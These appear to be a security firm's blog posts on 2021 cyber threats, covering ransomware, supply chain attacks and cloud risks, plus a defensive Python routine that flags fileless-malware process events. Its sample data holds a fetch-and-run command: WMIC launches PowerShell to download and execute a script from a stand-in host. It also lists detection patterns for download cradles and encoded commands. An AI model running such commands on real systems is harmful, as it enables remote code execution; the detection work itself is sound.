Should We Prepare for a New Era of Cyber Pandemic in 2021

COVID-19 has led to the prolific use of virtual technologies to support remote work. This is gradually paving the way for a new pandemic: a sharp increase in organisations being held hostage by cyber criminals, data theft, privacy breaches and disruption to supply chains across the globe.

Organisations, already under pressure from COVID-19, are being targeted by a variety of scams and threats and are increasingly giving in to them. FatFace, a UK fashion retailer, paid out $2 million to a ransomware gang that breached its systems in January 2021.

More recently, in March 2021, Acer, a Taiwanese electronics company, was attacked by a group called REvil, which demanded a ransom of $50 million, one of the largest ransomware demands in recent history. A wide range of reports by cybersecurity scholars (FireEye 2021, Hiscox 2020, Vasek 2019) have established that cyberattacks are rapidly evolving and growing in both frequency and severity, with costs reaching up to $6 trillion in 2021 and set to rise further. These reports, along with other security news outlets, have discussed trends that will dominate the cybersecurity landscape in 2021. Some of these are:

1. Evolution of attack techniques and IoT threats

Common attack techniques such as phishing, ransomware, botnets, trojans and phreaking will remain prominent. However, they will likely be automated using artificial intelligence and tailored to specific companies as targets, after careful mining of data on personnel, social networks and social media. The lack of time to train staff in the use of remote technology applications and of IoT devices in homes is set to exacerbate the problem.

2. The cloud footprint

95% of companies have a cloud presence, if only for payroll or HR functions. Cloud attacks are likely to grow and to be executed by hacking vulnerable cloud applications, stealing credentials via phishing, exploiting misconfigurations and compromising the supply chain, such as cloud vendors.

3. Nation State Attacks

The attack on SolarWinds in 2020 demonstrated that threat actors can be nation states, which can sponsor regional and global attacks. Spear phishing, a common tool, will continue to dominate in 2021. However, there is an increased focus on intrusion techniques such as exploitation of web-facing applications, password spraying and increased use of third-party intrusion vendors.

4. Fileless malware

Fileless malware depends on tools that are part of the workflow for most enterprises, specifically tools that are pre-installed on every Windows machine and are vital for all operations. Attackers could use a range of Windows processes such as PowerShell, Windows Management Instrumentation (WMI) and .NET. We are likely to see attackers continuously innovate and share techniques as they develop such malware under a malware-as-a-service model in 2021.
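Because the tools named above are legitimate administration tools, detection has to key on how they are invoked rather than on the binary alone. The following is an added example written for this page, not Cystel's tooling: a small triage routine that runs living-off-the-land heuristics over constructed process-creation events. The event fields, the rule set and the sample command lines are assumptions.

```python
import re

# Constructed process-creation events in the shape a SIEM holds after parsing
# Windows Security event 4688 or Sysmon event 1. Sample data only; the -enc
# value is a placeholder, not a real encoded script.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"id": 2, "host": "ws02", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc BASE64PLACEHOLDER"},
    {"id": 3, "host": "ws03", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": "wmic process call create \"powershell -nop -c IEX "
                "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"id": 4, "host": "srv01", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"id": 5, "host": "ws04", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": "wmic os get caption"},
]

# Script hosts the page names (PowerShell, WMI); the rules cover PowerShell,
# WMI and .NET invocation patterns that rarely appear in routine admin use.
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
RULES = [
    (re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s", re.I), "PowerShell encoded command"),
    (re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "in-memory script execution"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
     "download cradle"),
    (re.compile(r"process\s+call\s+create|Win32_Process|Invoke-(?:Wmi|Cim)Method", re.I),
     "WMI process creation"),
    (re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I), ".NET in-memory assembly load"),
]

def triage(event):
    """Return the reasons an event looks like fileless activity; empty list if none fire."""
    image, parent = event["image"].lower(), event["parent"].lower()
    if image not in LOLBINS:
        return []
    reasons = []
    if parent in OFFICE_PARENTS:  # document-borne phishing handing off to a script host
        reasons.append(f"{image} spawned by Office application {parent}")
    reasons.extend(reason for pattern, reason in RULES if pattern.search(event["cmdline"]))
    return reasons

def triage_all(events):
    """Map event id -> reasons for every event that tripped at least one rule."""
    return {e["id"]: r for e in events if (r := triage(e))}
```

Events 1, 4 and 5 show that plain PowerShell or WMI use is not flagged on its own; only the invocation patterns and the Office parent raise a finding.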

2021 brings new challenges on the health and cyber fronts. As cyber criminals organise themselves as ‘companies’ and improve both their technologies and attack strategies, we must, as a matter of urgency, look at our own cybersecurity and data protection. Surface-level products and software are not enough to combat the threats that 2021 brings. Advanced solutions are needed to monitor risks and assess vulnerabilities, together with endpoint solutions to thwart threats and build cyber resilience.

The World Economic Forum lists cybersecurity failures among the main global risks in 2021.

Can you shield against a cyber pandemic?

A risk management approach is vital to digital security. A significant part of securing the cyber landscape is knowing how best to protect the most significant assets and effectively defend against security incidents and breaches. As with a biological pandemic, some key steps are:

  • Reduce the rate of infection. Check your systems to protect critical assets and detect and remove threats in real time.
  • Prevent an infection. Develop a SOC for real-time prevention and access to continuous security intelligence.
  • Improve cyber hygiene. Practise cyber hygiene by keeping up to date with security threats and ensuring compliance with regulations and the latest standards.

At Cystel, we recommend asking the following key questions to test your state of preparedness.

  • What is my current security protocol?
  • What vulnerabilities or gaps do I have in my remote infrastructure?
  • Do I understand security effectiveness as a business metric?
  • What is my risk management approach to mitigating threats of IoT?
  • Is my organisation’s security training state-of-the-art?

As cybersecurity researchers at Cystel, we believe cyber readiness needs to be a top priority for every connected individual. There is no one size that fits all, and there are a variety of solutions, services and protocols to evaluate to help meet security challenges. Speak to us about your cyber challenges for 2021 and stay safe during the next wave of cyber attacks.

Are You Vulnerable to Supply Chain Attacks?

A supply chain attack, sometimes referred to as a “value-chain” or “third-party” attack, occurs when someone penetrates your systems via an external partner or supplier who already has access to your systems, information and data. Given the number of suppliers that companies work with, as well as the recent increase in remote working across supply chains, the attack surface has increased drastically.

The Guardian reported on a recent supply chain attack using software from SolarWinds, a network management tools developer. As part of this Russia-attributed attack, approximately 18,000 customers were affected, and numerous government and company networks were penetrated. The attack impacted as many as 250 organizations. The hackers managed to penetrate multiple supply chain layers, and the outsourcing of different software solutions appeared to be one of the main drivers of the attack, which culminated in an estimated cost of $90 million for cyber insurance firms (according to BitSight).

It is important to be aware of where supply chain attacks can come from. Companies may encounter five kinds of cybersecurity risks in supply chains, namely: physical threats, breakdowns, indirect attacks, direct attacks and insider threats.

Physical threats are associated with items such as switches, servers, routers and other information and communication technology devices. Environmental disasters such as flooding, heavy snow and tornadoes, deliberate damage to a firm’s infrastructure, theft and malfunctioning of infrastructure components, as well as terrorist attacks, all fall under this category of physical threats.

In terms of breakdowns, risks such as outdated firewalls and delayed cybersecurity updates can also attract the attention of hackers. Although these risks are more predictable than some of the risks mentioned above, their effects can be just as dire.

Deliberate attacks can be broken down into direct and indirect attacks. Direct attacks involve being hacked, denied service or having your password sniffed, all for the purpose of manipulating or threatening you for money (consider industrial espionage or an individual compromising your firm’s intellectual property). Indirect attacks are like bait used for fishing: if employees fall for the bait, hackers can access the systems the bait was intended to reach. Trojans, worms, viruses, counterfeit products, as well as compromised hardware and software come to mind. Malicious code and spoofing attacks also feature in this category. In particular, phishing attacks (someone gaining access to sensitive information while your employee thinks they can trust the software or device they are using) have increased in recent times.

Finally, employees posing a cybersecurity threat are referred to as an insider threat. From this perspective, careless employees who use simplistic passwords, write down their passwords or unintentionally disclose sensitive information are associated with this risk. These risks can also be fuelled by intent, for example opportunistic misuse of information or taking revenge. Whether these risks arise from negligence or premeditation, the human factor is key here.

Following the mantra, “smart executives learn from their mistakes, wise executives learn from the mistakes of others”, below are some ways you can take action:

Key strategies for protecting against supply chain attacks

  1. Develop an approach to identify, prioritise and mitigate cybersecurity supply chain attacks and disruptions.
  2. Publish emergency response and crisis management guidelines.
  3. Create a risk-mitigation approach which supports your global sourcing strategy.
  4. Collaborate with suppliers to support them in developing business continuity programmes which ensure the continuation of supply.
  5. Improve logistics continuity plans with global logistics partners.

Important Outcomes for ensuring effective cybersecurity measures

  • Emergency response and crisis management guidelines to decrease the effects of supply chain attacks and disruptions
  • A cybersecurity preparedness plan
  • A supply continuity plan for suppliers of critical parts
  • A warehousing and inventory positioning strategy, which buffers supply disruptions
  • A risk exposure database including a traffic light system, which provides early warning indicators of supply disruption

In order to identify the threats highlighted in any of the five threat categories mentioned above and to develop appropriate strategies in your supply chain, our risk and crisis management approach can help you to build your cybersecurity defensive and offensive capabilities, reduce your exposure, minimise your vulnerabilities and strengthen your defences, thereby decreasing the chances of a potential breach.

In addition, our threat management and incident response capabilities will enable you to take action quickly and forcefully against unexpected cybersecurity threats and increase your ability to respond and recover in a timely manner.

If the situation in your supply chain does not require urgent action at this moment, we also offer cybersecurity training programs, such as our “cybersecurity in a day for executives” program as well as our cybersecurity training and awareness program for your workforce, which is delivered in partnership with the British Computer Society (BCS).

Cloud Technologies: Easy Solution or Security Nightmare?

A Gartner study from October 2019 forecast that the public cloud services market would reach $266.4 billion in 2020. A 17% growth rate seems high, but it pales against the 50% overall increase in cloud utilization across the enterprise that McAfee reported in 2020, partially motivated by COVID-19 related mandates.
Fast time to market, apparent simplicity and lower technological, business and financial barriers have made the cloud the preferred real estate for individuals and enterprises alike. Cloud technology is a game changer and a life saver, but it can also be a cybersecurity nightmare.

As organizations extended their technology landscape across multiple physical and trust boundaries, what used to be a solid perimeter to protect is now a series of highly dynamic “micro-borders”, or no clearly delimited border at all. This change in the technology landscape also exposes a problem with current cybersecurity approaches and paradigms, which were originally designed to protect organizations starting at their borders.

When organizations extend their networks to the cloud, they are trading security for time to market, productivity, efficiency, usability and accessibility, a price that businesses will pay gladly. Many times, these implementations are a product of firms’ strategies or planned processes, but often cloud technology adoption responds to emergencies. When the latter happens, the outcome is an implementation plagued with vulnerabilities.

We know now that architecting and designing solutions in or for cloud technologies require a different set of skills. The selection, deployment, configuration and integration of cloud artifacts, the use of trusted domains, the management of certificates, the whitelisting of addresses, the practice of allowing apps to bypass inline defences, the need for data movement across boundaries and the vulnerabilities intrinsic to browsers all create openings that malicious actors could use to gain access to our data.

The attack vectors that corporate cloud users should be aware of include:

  • Data breaches and loss
  • Insider attacks
  • DoS and DDoS attacks
  • Cloud phishing
  • Cloud malware injection
  • Cross-cloud attacks
  • Side channel attacks
  • Credential stuffing attacks

So how do companies adapt their cybersecurity postures and develop the policies, controls, processes and technologies to protect their data and meet regulatory compliance requirements?

Our recommendations to protect your data and your users in the cloud include the following:

  • Implement a Zero Trust security approach to control access to your workloads and limit lateral movement across the network.
  • Use strong passwords, multi-factor authentication (MFA) and access controls.
  • Grant access selectively through adaptive access based on user, app, instance, device, location, data and destination.
  • Protect endpoints using endpoint threat management and response solutions.
  • Implement continuous security risk assessments.
  • Secure and manage network traffic.
  • Restrict cloud utilization and manage adoption in a centralized manner.
  • Implement granular data protection controls.
  • Implement cloud data loss prevention.
  • Implement threat hunting.
  • Run continuous training and awareness programs.

The adoption of these technologies is quick and simple. Cloud services enable organizations’ processes, improve quality and increase productivity and speed to market, but they also create vulnerabilities that must be addressed before it is too late. As organizations extend their technology landscape across boundaries, traditional cybersecurity postures may not be able to provide the level of protection needed. Cystel specializes in detecting and remediating cybersecurity vulnerabilities in these enterprise deployments, reducing your risk so you can focus on your core business.